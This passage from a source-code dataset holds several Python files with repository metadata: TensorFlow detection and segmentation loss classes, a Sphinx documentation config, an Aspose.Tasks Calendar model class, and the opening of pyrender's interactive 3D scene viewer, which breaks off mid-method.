representing the foreground mask targets.
Returns:
mask_loss: a float tensor representing total mask loss.
"""
with tf.name_scope('mask_rcnn_loss'):
(batch_size, num_masks, mask_height,
mask_width) = mask_outputs.get_shape().as_list()
weights = tf.tile(
tf.reshape(tf.greater(select_class_targets, 0),
[batch_size, num_masks, 1, 1]),
[1, 1, mask_height, mask_width])
weights = tf.cast(weights, dtype=tf.float32)
mask_targets = tf.expand_dims(mask_targets, axis=-1)
mask_outputs = tf.expand_dims(mask_outputs, axis=-1)
mask_loss = self._binary_crossentropy(mask_targets, mask_outputs,
sample_weight=weights)
# The loss is normalized by the number of 1's in weights and
# + 0.01 is used to avoid division by zero.
return mask_loss / (tf.reduce_sum(weights) + 0.01)
class RetinanetClassLoss(object):
"""RetinaNet class loss."""
def __init__(self, params, num_classes):
self._num_classes = num_classes
self._focal_loss_alpha = params.focal_loss_alpha
self._focal_loss_gamma = params.focal_loss_gamma
def __call__(self, cls_outputs, labels, num_positives):
"""Computes total detection loss.
Computes total detection loss including box and class loss from all levels.
Args:
cls_outputs: an OrderDict with keys representing levels and values
representing logits in [batch_size, height, width,
num_anchors * num_classes].
labels: the dictionary that returned from dataloader that includes
class groundturth targets.
num_positives: number of positive examples in the minibatch.
Returns:
an integar tensor representing total class loss.
"""
# Sums all positives in a batch for normalization and avoids zero
# num_positives_sum, which would lead to inf loss during training
num_positives_sum = tf.reduce_sum(input_tensor=num_positives) + 1.0
cls_losses = []
for level in cls_outputs.keys():
cls_losses.append(self.class_loss(
cls_outputs[level], labels[level], num_positives_sum))
# Sums per level losses to total loss.
return tf.add_n(cls_losses)
def class_loss(self, cls_outputs, cls_targets, num_positives,
ignore_label=-2):
"""Computes RetinaNet classification loss."""
# Onehot encoding for classification labels.
cls_targets_one_hot = tf.one_hot(cls_targets, self._num_classes)
bs, height, width, _, _ = cls_targets_one_hot.get_shape().as_list()
cls_targets_one_hot = tf.reshape(cls_targets_one_hot,
[bs, height, width, -1])
loss = focal_loss(cls_outputs, cls_targets_one_hot,
self._focal_loss_alpha, self._focal_loss_gamma,
num_positives)
ignore_loss = tf.where(
tf.equal(cls_targets, ignore_label),
tf.zeros_like(cls_targets, dtype=tf.float32),
tf.ones_like(cls_targets, dtype=tf.float32),
)
ignore_loss = tf.expand_dims(ignore_loss, -1)
ignore_loss = tf.tile(ignore_loss, [1, 1, 1, 1, self._num_classes])
ignore_loss = tf.reshape(ignore_loss, tf.shape(input=loss))
return tf.reduce_sum(input_tensor=ignore_loss * loss)
class RetinanetBoxLoss(object):
"""RetinaNet box loss."""
def __init__(self, params):
self._huber_loss = tf.keras.losses.Huber(
delta=params.huber_loss_delta, reduction=tf.keras.losses.Reduction.SUM)
def __call__(self, box_outputs, labels, num_positives):
"""Computes box detection loss.
Computes total detection loss including box and class loss from all levels.
Args:
box_outputs: an OrderDict with keys representing levels and values
representing box regression targets in [batch_size, height, width,
num_anchors * 4].
labels: the dictionary that returned from dataloader that includes
box groundturth targets.
num_positives: number of positive examples in the minibatch.
Returns:
an integar tensor representing total box regression loss.
"""
# Sums all positives in a batch for normalization and avoids zero
# num_positives_sum, which would lead to inf loss during training
num_positives_sum = tf.reduce_sum(input_tensor=num_positives) + 1.0
box_losses = []
for level in box_outputs.keys():
# Onehot encoding for classification labels.
box_targets_l = labels[level]
box_losses.append(
self.box_loss(box_outputs[level], box_targets_l, num_positives_sum))
# Sums per level losses to total loss.
return tf.add_n(box_losses)
def box_loss(self, box_outputs, box_targets, num_positives):
"""Computes RetinaNet box regression loss."""
# The delta is typically around the mean value of regression target.
# for instances, the regression targets of 512x512 input with 6 anchors on
# P3-P7 pyramid is about [0.1, 0.1, 0.2, 0.2].
normalizer = num_positives * 4.0
mask = tf.cast(tf.not_equal(box_targets, 0.0), dtype=tf.float32)
box_targets = tf.expand_dims(box_targets, axis=-1)
box_outputs = tf.expand_dims(box_outputs, axis=-1)
box_loss = self._huber_loss(box_targets, box_outputs, sample_weight=mask)
box_loss /= normalizer
return box_loss
class ShapemaskMseLoss(object):
"""ShapeMask mask Mean Squared Error loss function wrapper."""
def __call__(self, probs, labels, valid_mask):
"""Compute instance segmentation loss.
Args:
probs: A Tensor of shape [batch_size * num_points, height, width,
num_classes]. The logits are not necessarily between 0 and 1.
labels: A float32/float16 Tensor of shape [batch_size, num_instances,
mask_size, mask_size], where mask_size =
mask_crop_size * gt_upsample_scale for fine mask, or mask_crop_size
for coarse masks and shape priors.
valid_mask: a binary mask indicating valid training masks.
Returns:
loss: an float tensor representing total mask classification loss.
"""
with tf.name_scope('shapemask_prior_loss'):
batch_size, num_instances = valid_mask.get_shape().as_list()[:2]
diff = (tf.cast(labels, dtype=tf.float32) -
tf.cast(probs, dtype=tf.float32))
diff *= tf.cast(
tf.reshape(valid_mask, [batch_size, num_instances, 1, 1]),
tf.float32)
# Adding 0.001 in the denominator to avoid division by zero.
loss = tf.nn.l2_loss(diff) / (tf.reduce_sum(labels) + 0.001)
return loss
class ShapemaskLoss(object):
"""ShapeMask mask loss function wrapper."""
def __init__(self):
self._binary_crossentropy = tf.keras.losses.BinaryCrossentropy(
reduction=tf.keras.losses.Reduction.SUM, from_logits=True)
def __call__(self, logits, labels, valid_mask):
"""ShapeMask mask cross entropy loss function wrapper.
Args:
logits: A Tensor of shape [batch_size * num_instances, height, width,
num_classes]. The logits are not necessarily between 0 and 1.
labels: A float16/float32 Tensor of shape [batch_size, num_instances,
mask_size, mask_size], where mask_size =
mask_crop_size * gt_upsample_scale for fine mask, or mask_crop_size
for coarse masks and shape priors.
valid_mask: a binary mask of shape [batch_size, num_instances]
indicating valid training masks.
Returns:
loss: an float tensor representing total mask classification loss.
"""
with tf.name_scope('shapemask_loss'):
batch_size, num_instances = valid_mask.get_shape().as_list()[:2]
labels = tf.cast(labels, tf.float32)
logits = tf.cast(logits, tf.float32)
loss = self._binary_crossentropy(labels, logits)
loss *= tf.cast(tf.reshape(
valid_mask, [batch_size, num_instances, 1, 1]), loss.dtype)
# Adding 0.001 in the denominator to avoid division by zero.
loss = tf.reduce_sum(loss) / (tf.reduce_sum(labels) + 0.001)
return loss
| 42.545287
| 186
| 0.682626
|
4bf0c1266dd79e0aa7dad9942a18418f53c42b40
| 2,427
|
py
|
Python
|
docs/source/conf.py
|
rchui/laminar
|
63bcc813484bd8510bcfa93456e46118b7093b5e
|
[
"MIT"
] | null | null | null |
docs/source/conf.py
|
rchui/laminar
|
63bcc813484bd8510bcfa93456e46118b7093b5e
|
[
"MIT"
] | 1
|
2022-02-04T00:50:26.000Z
|
2022-02-04T00:50:26.000Z
|
docs/source/conf.py
|
rchui/laminar
|
83e03aa97a11943218fc792b0f33017200cb10be
|
[
"MIT"
] | null | null | null |
import os
import sys
from typing import Any
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath("../.."))
# -- Project information -----------------------------------------------------
project = "laminar"
copyright = "2021, Ryan Chui"
author = "Ryan Chui <ryan.w.chui@gmail.com>"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"myst_parser",
"sphinx.ext.autodoc",
"sphinx.ext.autosectionlabel",
"sphinx.ext.autosummary",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
]
autosummary_generate = True # Make and include autosummary files
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
# exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# -- Special members ---------------------------------------------------------
def skip(app: Any, what: Any, name: str, obj: Any, would_skip: bool, options: Any) -> bool:
if name == "__init__":
return False
return would_skip
def setup(app: Any) -> None:
app.connect("autodoc-skip-member", skip)
| 32.36
| 91
| 0.646889
|
2552f3e9b067632eb8aa7f91192f1ecce678d4e7
| 8,809
|
py
|
Python
|
asposetaskscloud/models/calendar.py
|
aspose-tasks-cloud/aspose-tasks-cloud-python
|
d1852a02fb1aa2591501a34d5e56079f8aac43f0
|
[
"MIT"
] | 2
|
2021-08-16T09:25:51.000Z
|
2022-01-27T20:20:41.000Z
|
asposetaskscloud/models/calendar.py
|
aspose-tasks-cloud/aspose-tasks-cloud-python
|
d1852a02fb1aa2591501a34d5e56079f8aac43f0
|
[
"MIT"
] | null | null | null |
asposetaskscloud/models/calendar.py
|
aspose-tasks-cloud/aspose-tasks-cloud-python
|
d1852a02fb1aa2591501a34d5e56079f8aac43f0
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose" file="Calendar.py">
# Copyright (c) 2020 Aspose.Tasks Cloud
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
import pprint
import re # noqa: F401
import six
class Calendar(object):
"""Represents a calendar used in a project.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'uid': 'int',
'days': 'list[WeekDay]',
'is_base_calendar': 'bool',
'base_calendar': 'Calendar',
'is_baseline_calendar': 'bool'
}
attribute_map = {
'name': 'name',
'uid': 'uid',
'days': 'days',
'is_base_calendar': 'isBaseCalendar',
'base_calendar': 'baseCalendar',
'is_baseline_calendar': 'isBaselineCalendar'
}
def __init__(self, name=None, uid=None, days=None, is_base_calendar=None, base_calendar=None, is_baseline_calendar=None): # noqa: E501
"""Calendar - a model defined in Swagger""" # noqa: E501
self._name = None
self._uid = None
self._days = None
self._is_base_calendar = None
self._base_calendar = None
self._is_baseline_calendar = None
self.discriminator = None
if name is not None:
self.name = name
if uid is not None:
self.uid = uid
if days is not None:
self.days = days
if is_base_calendar is not None:
self.is_base_calendar = is_base_calendar
if base_calendar is not None:
self.base_calendar = base_calendar
if is_baseline_calendar is not None:
self.is_baseline_calendar = is_baseline_calendar
@property
def name(self):
"""Gets the name of this Calendar. # noqa: E501
The name of the calendar. # noqa: E501
:return: The name of this Calendar. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this Calendar.
The name of the calendar. # noqa: E501
:param name: The name of this Calendar. # noqa: E501
:type: str
"""
self._name = name
@property
def uid(self):
"""Gets the uid of this Calendar. # noqa: E501
The unique identifier of the calendar. # noqa: E501
:return: The uid of this Calendar. # noqa: E501
:rtype: int
"""
return self._uid
@uid.setter
def uid(self, uid):
"""Sets the uid of this Calendar.
The unique identifier of the calendar. # noqa: E501
:param uid: The uid of this Calendar. # noqa: E501
:type: int
"""
if uid is None:
raise ValueError("Invalid value for `uid`, must not be `None`") # noqa: E501
self._uid = uid
@property
def days(self):
"""Gets the days of this Calendar. # noqa: E501
The collection of weekdays that defines the calendar. # noqa: E501
:return: The days of this Calendar. # noqa: E501
:rtype: list[WeekDay]
"""
return self._days
@days.setter
def days(self, days):
"""Sets the days of this Calendar.
The collection of weekdays that defines the calendar. # noqa: E501
:param days: The days of this Calendar. # noqa: E501
:type: list[WeekDay]
"""
self._days = days
@property
def is_base_calendar(self):
"""Gets the is_base_calendar of this Calendar. # noqa: E501
Determines whether the calendar is a base calendar. # noqa: E501
:return: The is_base_calendar of this Calendar. # noqa: E501
:rtype: bool
"""
return self._is_base_calendar
@is_base_calendar.setter
def is_base_calendar(self, is_base_calendar):
"""Sets the is_base_calendar of this Calendar.
Determines whether the calendar is a base calendar. # noqa: E501
:param is_base_calendar: The is_base_calendar of this Calendar. # noqa: E501
:type: bool
"""
if is_base_calendar is None:
raise ValueError("Invalid value for `is_base_calendar`, must not be `None`") # noqa: E501
self._is_base_calendar = is_base_calendar
@property
def base_calendar(self):
"""Gets the base_calendar of this Calendar. # noqa: E501
The base calendar on which this calendar depends. Only applicable if the calendar is not a base calendar. # noqa: E501
:return: The base_calendar of this Calendar. # noqa: E501
:rtype: Calendar
"""
return self._base_calendar
@base_calendar.setter
def base_calendar(self, base_calendar):
"""Sets the base_calendar of this Calendar.
The base calendar on which this calendar depends. Only applicable if the calendar is not a base calendar. # noqa: E501
:param base_calendar: The base_calendar of this Calendar. # noqa: E501
:type: Calendar
"""
self._base_calendar = base_calendar
@property
def is_baseline_calendar(self):
"""Gets the is_baseline_calendar of this Calendar. # noqa: E501
Specifies whether the calendar is a baseline calendar. # noqa: E501
:return: The is_baseline_calendar of this Calendar. # noqa: E501
:rtype: bool
"""
return self._is_baseline_calendar
@is_baseline_calendar.setter
def is_baseline_calendar(self, is_baseline_calendar):
"""Sets the is_baseline_calendar of this Calendar.
Specifies whether the calendar is a baseline calendar. # noqa: E501
:param is_baseline_calendar: The is_baseline_calendar of this Calendar. # noqa: E501
:type: bool
"""
if is_baseline_calendar is None:
raise ValueError("Invalid value for `is_baseline_calendar`, must not be `None`") # noqa: E501
self._is_baseline_calendar = is_baseline_calendar
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Calendar):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 34.011583
| 139
| 0.601884
|
23170666ae6bf19e7e069a252d786a7db1dcfcb4
| 43,131
|
py
|
Python
|
pyrender/viewer.py
|
monsieurgustav/pyrender
|
10ada1d4f895a4e9272299347def675ec4ba4407
|
[
"MIT"
] | 53
|
2020-03-29T04:15:44.000Z
|
2022-03-19T02:49:12.000Z
|
pyrender/viewer.py
|
monsieurgustav/pyrender
|
10ada1d4f895a4e9272299347def675ec4ba4407
|
[
"MIT"
] | 3
|
2020-07-13T12:54:58.000Z
|
2020-11-18T15:50:04.000Z
|
pyrender/viewer.py
|
monsieurgustav/pyrender
|
10ada1d4f895a4e9272299347def675ec4ba4407
|
[
"MIT"
] | 7
|
2020-06-16T14:42:48.000Z
|
2021-04-13T04:34:52.000Z
|
"""A pyglet-based interactive 3D scene viewer.
"""
import copy
import os
import sys
from threading import Thread, RLock
import time
import imageio
import numpy as np
import OpenGL
import trimesh
try:
from Tkinter import Tk, tkFileDialog as filedialog
except Exception:
try:
from tkinter import Tk, filedialog as filedialog
except Exception:
pass
from .constants import (OPEN_GL_MAJOR, OPEN_GL_MINOR, TEXT_PADDING, DEFAULT_SCENE_SCALE,
DEFAULT_Z_FAR, DEFAULT_Z_NEAR, RenderFlags, TextAlign)
from .light import DirectionalLight
from .node import Node
from .camera import PerspectiveCamera, OrthographicCamera, IntrinsicsCamera
from .trackball import Trackball
from .renderer import Renderer
from .mesh import Mesh
import pyglet
from pyglet import clock
pyglet.options['shadow_window'] = False
class Viewer(pyglet.window.Window):
"""An interactive viewer for 3D scenes.
The viewer's camera is separate from the scene's, but will take on
the parameters of the scene's main view camera and start in the same pose.
If the scene does not have a camera, a suitable default will be provided.
Parameters
----------
scene : :class:`Scene`
The scene to visualize.
viewport_size : (2,) int
The width and height of the initial viewing window.
render_flags : dict
A set of flags for rendering the scene. Described in the note below.
viewer_flags : dict
A set of flags for controlling the viewer's behavior.
Described in the note below.
registered_keys : dict
A map from ASCII key characters to tuples containing:
- A function to be called whenever the key is pressed,
whose first argument will be the viewer itself.
- (Optionally) A list of additional positional arguments
to be passed to the function.
- (Optionally) A dict of keyword arguments to be passed
to the function.
kwargs : dict
Any keyword arguments left over will be interpreted as belonging to
either the :attr:`.Viewer.render_flags` or :attr:`.Viewer.viewer_flags`
dictionaries. Those flag sets will be updated appropriately.
Note
----
The basic commands for moving about the scene are given as follows:
- **Rotating about the scene**: Hold the left mouse button and
drag the cursor.
- **Rotating about the view axis**: Hold ``CTRL`` and the left mouse
button and drag the cursor.
- **Panning**:
- Hold SHIFT, then hold the left mouse button and drag the cursor, or
- Hold the middle mouse button and drag the cursor.
- **Zooming**:
- Scroll the mouse wheel, or
- Hold the right mouse button and drag the cursor.
Other keyboard commands are as follows:
- ``a``: Toggles rotational animation mode.
- ``c``: Toggles backface culling.
- ``f``: Toggles fullscreen mode.
- ``h``: Toggles shadow rendering.
- ``i``: Toggles axis display mode
(no axes, world axis, mesh axes, all axes).
- ``l``: Toggles lighting mode
(scene lighting, Raymond lighting, or direct lighting).
- ``m``: Toggles face normal visualization.
- ``n``: Toggles vertex normal visualization.
- ``o``: Toggles orthographic mode.
- ``q``: Quits the viewer.
- ``r``: Starts recording a GIF, and pressing again stops recording
and opens a file dialog.
- ``s``: Opens a file dialog to save the current view as an image.
- ``w``: Toggles wireframe mode
(scene default, flip wireframes, all wireframe, or all solid).
- ``z``: Resets the camera to the initial view.
Note
----
The valid keys for ``render_flags`` are as follows:
- ``flip_wireframe``: `bool`, If `True`, all objects will have their
wireframe modes flipped from what their material indicates.
Defaults to `False`.
- ``all_wireframe``: `bool`, If `True`, all objects will be rendered
in wireframe mode. Defaults to `False`.
- ``all_solid``: `bool`, If `True`, all objects will be rendered in
solid mode. Defaults to `False`.
- ``shadows``: `bool`, If `True`, shadows will be rendered.
Defaults to `False`.
- ``vertex_normals``: `bool`, If `True`, vertex normals will be
rendered as blue lines. Defaults to `False`.
- ``face_normals``: `bool`, If `True`, face normals will be rendered as
blue lines. Defaults to `False`.
- ``cull_faces``: `bool`, If `True`, backfaces will be culled.
Defaults to `True`.
- ``point_size`` : float, The point size in pixels. Defaults to 1px.
Note
----
The valid keys for ``viewer_flags`` are as follows:
- ``rotate``: `bool`, If `True`, the scene's camera will rotate
about an axis. Defaults to `False`.
- ``rotate_rate``: `float`, The rate of rotation in radians per second.
Defaults to `PI / 3.0`.
- ``rotate_axis``: `(3,) float`, The axis in world coordinates to rotate
about. Defaults to ``[0,0,1]``.
- ``view_center``: `(3,) float`, The position to rotate the scene about.
Defaults to the scene's centroid.
- ``use_raymond_lighting``: `bool`, If `True`, an additional set of three
directional lights that move with the camera will be added to the scene.
Defaults to `False`.
- ``use_direct_lighting``: `bool`, If `True`, an additional directional
light that moves with the camera and points out of it will be added to
the scene. Defaults to `False`.
- ``lighting_intensity``: `float`, The overall intensity of the
viewer's additional lights (when they're in use). Defaults to 3.0.
- ``use_perspective_cam``: `bool`, If `True`, a perspective camera will
be used. Otherwise, an orthographic camera is used. Defaults to `True`.
- ``save_directory``: `str`, A directory to open the file dialogs in.
Defaults to `None`.
- ``window_title``: `str`, A title for the viewer's application window.
Defaults to `"Scene Viewer"`.
- ``refresh_rate``: `float`, A refresh rate for rendering, in Hertz.
Defaults to `30.0`.
- ``fullscreen``: `bool`, Whether to make viewer fullscreen.
Defaults to `False`.
- ``show_world_axis``: `bool`, Whether to show the world axis.
Defaults to `False`.
- ``show_mesh_axes``: `bool`, Whether to show the individual mesh axes.
Defaults to `False`.
- ``caption``: `list of dict`, Text caption(s) to display on the viewer.
Defaults to `None`.
Note
----
Animation can be accomplished by running the viewer with ``run_in_thread``
enabled. Then, just run a loop in your main thread, updating the scene as
needed. Before updating the scene, be sure to acquire the
:attr:`.Viewer.render_lock`, and release it when your update is done.
"""
def __init__(self, scene, viewport_size=None,
render_flags=None, viewer_flags=None,
registered_keys=None, run_in_thread=False, **kwargs):
#######################################################################
# Save attributes and flags
#######################################################################
if viewport_size is None:
viewport_size = (640, 480)
self._scene = scene
self._viewport_size = viewport_size
self._render_lock = RLock()
self._is_active = False
self._should_close = False
self._run_in_thread = run_in_thread
self._default_render_flags = {
'flip_wireframe': False,
'all_wireframe': False,
'all_solid': False,
'shadows': False,
'vertex_normals': False,
'face_normals': False,
'cull_faces': True,
'point_size': 1.0,
}
self._default_viewer_flags = {
'mouse_pressed': False,
'rotate': False,
'rotate_rate': np.pi / 3.0,
'rotate_axis': np.array([0.0, 0.0, 1.0]),
'view_center': None,
'record': False,
'use_raymond_lighting': False,
'use_direct_lighting': False,
'lighting_intensity': 3.0,
'use_perspective_cam': True,
'save_directory': None,
'window_title': 'Scene Viewer',
'refresh_rate': 30.0,
'fullscreen': False,
'show_world_axis': False,
'show_mesh_axes': False,
'caption': None
}
self._render_flags = self._default_render_flags.copy()
self._viewer_flags = self._default_viewer_flags.copy()
self._viewer_flags['rotate_axis'] = (
self._default_viewer_flags['rotate_axis'].copy()
)
if render_flags is not None:
self._render_flags.update(render_flags)
if viewer_flags is not None:
self._viewer_flags.update(viewer_flags)
for key in kwargs:
if key in self.render_flags:
self._render_flags[key] = kwargs[key]
elif key in self.viewer_flags:
self._viewer_flags[key] = kwargs[key]
# TODO MAC OS BUG FOR SHADOWS
if sys.platform == 'darwin':
self._render_flags['shadows'] = False
self._registered_keys = {}
if registered_keys is not None:
self._registered_keys = {
ord(k.lower()): registered_keys[k] for k in registered_keys
}
#######################################################################
# Save internal settings
#######################################################################
# Set up caption stuff
self._message_text = None
self._ticks_till_fade = 2.0 / 3.0 * self.viewer_flags['refresh_rate']
self._message_opac = 1.0 + self._ticks_till_fade
# Set up raymond lights and direct lights
self._raymond_lights = self._create_raymond_lights()
self._direct_light = self._create_direct_light()
# Set up axes
self._axes = {}
self._axis_mesh = Mesh.from_trimesh(
trimesh.creation.axis(origin_size=0.1, axis_radius=0.05,
axis_length=1.0), smooth=False)
if self.viewer_flags['show_world_axis']:
self._set_axes(world=self.viewer_flags['show_world_axis'],
mesh=self.viewer_flags['show_mesh_axes'])
#######################################################################
# Set up camera node
#######################################################################
self._camera_node = None
self._prior_main_camera_node = None
self._default_camera_pose = None
self._default_persp_cam = None
self._default_orth_cam = None
self._trackball = None
self._saved_frames = []
# Extract main camera from scene and set up our mirrored copy
znear = None
zfar = None
if scene.main_camera_node is not None:
n = scene.main_camera_node
camera = copy.copy(n.camera)
if isinstance(camera, (PerspectiveCamera, IntrinsicsCamera)):
self._default_persp_cam = camera
znear = camera.znear
zfar = camera.zfar
elif isinstance(camera, OrthographicCamera):
self._default_orth_cam = camera
znear = camera.znear
zfar = camera.zfar
self._default_camera_pose = scene.get_pose(scene.main_camera_node)
self._prior_main_camera_node = n
# Set defaults as needed
if zfar is None:
zfar = max(scene.scale * 10.0, DEFAULT_Z_FAR)
if znear is None or znear == 0:
if scene.scale == 0:
znear = DEFAULT_Z_NEAR
else:
znear = min(scene.scale / 10.0, DEFAULT_Z_NEAR)
if self._default_persp_cam is None:
self._default_persp_cam = PerspectiveCamera(
yfov=np.pi / 3.0, znear=znear, zfar=zfar
)
if self._default_orth_cam is None:
xmag = ymag = scene.scale
if scene.scale == 0:
xmag = ymag = 1.0
self._default_orth_cam = OrthographicCamera(
xmag=xmag, ymag=ymag,
znear=znear,
zfar=zfar
)
if self._default_camera_pose is None:
self._default_camera_pose = self._compute_initial_camera_pose()
# Pick camera
if self.viewer_flags['use_perspective_cam']:
camera = self._default_persp_cam
else:
camera = self._default_orth_cam
self._camera_node = Node(
matrix=self._default_camera_pose, camera=camera
)
scene.add_node(self._camera_node)
scene.main_camera_node = self._camera_node
self._reset_view()
#######################################################################
# Initialize OpenGL context and renderer
#######################################################################
self._renderer = Renderer(
self._viewport_size[0], self._viewport_size[1],
self.render_flags['point_size']
)
self._is_active = True
if self.run_in_thread:
self._thread = Thread(target=self._init_and_start_app)
self._thread.start()
else:
self._init_and_start_app()
@property
def scene(self):
""":class:`.Scene` : The scene being visualized.
"""
return self._scene
@property
def viewport_size(self):
"""(2,) int : The width and height of the viewing window.
"""
return self._viewport_size
@property
def render_lock(self):
""":class:`threading.RLock` : If acquired, prevents the viewer from
rendering until released.
Run :meth:`.Viewer.render_lock.acquire` before making updates to
the scene in a different thread, and run
:meth:`.Viewer.render_lock.release` once you're done to let the viewer
continue.
"""
return self._render_lock
@property
def is_active(self):
"""bool : `True` if the viewer is active, or `False` if it has
been closed.
"""
return self._is_active
@property
def run_in_thread(self):
"""bool : Whether the viewer was run in a separate thread.
"""
return self._run_in_thread
@property
def render_flags(self):
"""dict : Flags for controlling the renderer's behavior.
- ``flip_wireframe``: `bool`, If `True`, all objects will have their
wireframe modes flipped from what their material indicates.
Defaults to `False`.
- ``all_wireframe``: `bool`, If `True`, all objects will be rendered
in wireframe mode. Defaults to `False`.
- ``all_solid``: `bool`, If `True`, all objects will be rendered in
solid mode. Defaults to `False`.
- ``shadows``: `bool`, If `True`, shadows will be rendered.
Defaults to `False`.
- ``vertex_normals``: `bool`, If `True`, vertex normals will be
rendered as blue lines. Defaults to `False`.
- ``face_normals``: `bool`, If `True`, face normals will be rendered as
blue lines. Defaults to `False`.
- ``cull_faces``: `bool`, If `True`, backfaces will be culled.
Defaults to `True`.
- ``point_size`` : float, The point size in pixels. Defaults to 1px.
"""
return self._render_flags
@render_flags.setter
def render_flags(self, value):
self._render_flags = value
@property
def viewer_flags(self):
"""dict : Flags for controlling the viewer's behavior.
The valid keys for ``viewer_flags`` are as follows:
- ``rotate``: `bool`, If `True`, the scene's camera will rotate
about an axis. Defaults to `False`.
- ``rotate_rate``: `float`, The rate of rotation in radians per second.
Defaults to `PI / 3.0`.
- ``rotate_axis``: `(3,) float`, The axis in world coordinates to
rotate about. Defaults to ``[0,0,1]``.
- ``view_center``: `(3,) float`, The position to rotate the scene
about. Defaults to the scene's centroid.
- ``use_raymond_lighting``: `bool`, If `True`, an additional set of
three directional lights that move with the camera will be added to
the scene. Defaults to `False`.
- ``use_direct_lighting``: `bool`, If `True`, an additional directional
light that moves with the camera and points out of it will be
added to the scene. Defaults to `False`.
- ``lighting_intensity``: `float`, The overall intensity of the
viewer's additional lights (when they're in use). Defaults to 3.0.
- ``use_perspective_cam``: `bool`, If `True`, a perspective camera will
be used. Otherwise, an orthographic camera is used. Defaults to
`True`.
- ``save_directory``: `str`, A directory to open the file dialogs in.
Defaults to `None`.
- ``window_title``: `str`, A title for the viewer's application window.
Defaults to `"Scene Viewer"`.
- ``refresh_rate``: `float`, A refresh rate for rendering, in Hertz.
Defaults to `30.0`.
- ``fullscreen``: `bool`, Whether to make viewer fullscreen.
Defaults to `False`.
- ``show_world_axis``: `bool`, Whether to show the world axis.
Defaults to `False`.
- ``show_mesh_axes``: `bool`, Whether to show the individual mesh axes.
Defaults to `False`.
- ``caption``: `list of dict`, Text caption(s) to display on
the viewer. Defaults to `None`.
"""
return self._viewer_flags
@viewer_flags.setter
def viewer_flags(self, value):
self._viewer_flags = value
@property
def registered_keys(self):
"""dict : Map from ASCII key character to a handler function.
This is a map from ASCII key characters to tuples containing:
- A function to be called whenever the key is pressed,
whose first argument will be the viewer itself.
- (Optionally) A list of additional positional arguments
to be passed to the function.
- (Optionally) A dict of keyword arguments to be passed
to the function.
"""
return self._registered_keys
@registered_keys.setter
def registered_keys(self, value):
self._registered_keys = value
def close_external(self):
"""Close the viewer from another thread.
This function will wait for the actual close, so you immediately
manipulate the scene afterwards.
"""
self._should_close = True
while self.is_active:
time.sleep(1.0 / self.viewer_flags['refresh_rate'])
def save_gif(self, filename=None):
"""Save the stored GIF frames to a file.
To use this asynchronously, run the viewer with the ``record``
flag and the ``run_in_thread`` flags set.
Kill the viewer after your desired time with
:meth:`.Viewer.close_external`, and then call :meth:`.Viewer.save_gif`.
Parameters
----------
filename : str
The file to save the GIF to. If not specified,
a file dialog will be opened to ask the user where
to save the GIF file.
"""
if filename is None:
filename = self._get_save_filename(['gif', 'all'])
if filename is not None:
self.viewer_flags['save_directory'] = os.path.dirname(filename)
imageio.mimwrite(filename, self._saved_frames,
fps=self.viewer_flags['refresh_rate'],
palettesize=128, subrectangles=True)
self._saved_frames = []
def on_close(self):
"""Exit the event loop when the window is closed.
"""
# Remove our camera and restore the prior one
if self._camera_node is not None:
self.scene.remove_node(self._camera_node)
if self._prior_main_camera_node is not None:
self.scene.main_camera_node = self._prior_main_camera_node
# Delete any lighting nodes that we've attached
if self.viewer_flags['use_raymond_lighting']:
